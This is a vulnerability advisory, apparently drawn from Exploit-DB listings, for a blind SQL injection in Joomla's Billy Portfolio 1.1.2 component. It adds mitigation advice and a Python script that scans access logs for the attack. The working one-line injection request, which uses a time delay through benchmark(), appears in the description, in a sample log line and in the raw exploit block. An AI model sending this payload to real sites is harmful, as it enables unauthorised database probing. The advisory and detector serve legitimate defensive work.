Vendor: Billy Portfolio
By: jdc
CVSS: 7.5 (HIGH)
Type: Blind SQL Injection
CWE: 89
Product Name: Billy Portfolio
Affected Version From: 1.1.2
Affected Version To: 1.1.2
Patch Exists: Yes
Related CWE: N/A
CPE: a:joomla:billy_portfolio:1.1.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component Billy Portfolio 1.1.2 Blind SQL Injection

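This exploit allows an attacker to inject SQL through the catid parameter of the vulnerable Joomla Component Billy Portfolio 1.1.2. The published proof of concept requests index.php?option=com_billyportfolio&view=billyportfolio&catid=-1 and if(1,benchmark(5000000,md5(1)),1). The benchmark() call makes the database compute md5(1) 5,000,000 times, so a delayed response indicates that the injected condition was evaluated; the injection is blind because no query output is returned.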

Mitigation:

The best way to mitigate this vulnerability is to upgrade to the latest version of Joomla Component Billy Portfolio. Additionally, users should ensure that all web applications are kept up to date with the latest security patches.
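
One way to look for this request pattern in web-server access logs, as an added example that is not part of the original advisory. It assumes Apache combined-log format and that a legitimate catid is a plain non-negative integer; the log lines and the function name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined-log style (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2010:10:00:01 +0000] "GET /index.php?option=com_billyportfolio&view=billyportfolio&catid=3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Dec/2010:10:00:07 +0000] "GET /index.php?option=com_billyportfolio&view=billyportfolio&catid=-1%20and%20if(1,benchmark(5000000,md5(1)),1) HTTP/1.1" 200 812',
    '203.0.113.9 - - [10/Dec/2010:10:00:09 +0000] "GET /index.php?option=com_content&view=article&id=7 HTTP/1.1" 200 9000',
    '203.0.113.7 - - [10/Dec/2010:10:00:12 +0000] "GET /index.php?option=com_billyportfolio&view=billyportfolio&catid=abc HTTP/1.1" 200 800',
]

# Client address and request target from one log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# MySQL functions commonly used to delay a response.
TIMING_RE = re.compile(r'\b(benchmark|sleep)\s*\(', re.IGNORECASE)


def suspicious_requests(lines):
    """Return (client_ip, decoded_catid, reason) for com_billyportfolio
    requests whose catid is not a plain integer (assumed legitimate form)."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        ip, target = m.groups()
        # parse_qs URL-decodes values, so %20 and + both become spaces.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "com_billyportfolio" not in params.get("option", []):
            continue
        for catid in params.get("catid", []):
            if re.fullmatch(r"[0-9]+", catid):
                continue
            reason = "timing function" if TIMING_RE.search(catid) else "non-integer catid"
            findings.append((ip, catid, reason))
    return findings


if __name__ == "__main__":
    for finding in suspicious_requests(SAMPLE_LOG):
        print(finding)
```

Hits marked "timing function" are worth correlating with response times for the same requests, since the delay is the signal the injected condition relies on.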

Exploit-DB raw data:

# Exploit Title: Joomla Component Billy Portfolio 1.1.2 Blind SQL Injection
# Date: 10 Dec 2010
# Author: jdc
# Software Link: http://extensions.joomla.org/extensions/directory-a-documentation/portfolio/14834
# Version: 1.1.2

index.php?option=com_billyportfolio&view=billyportfolio&catid=-1 and if(1,benchmark(5000000,md5(1)),1)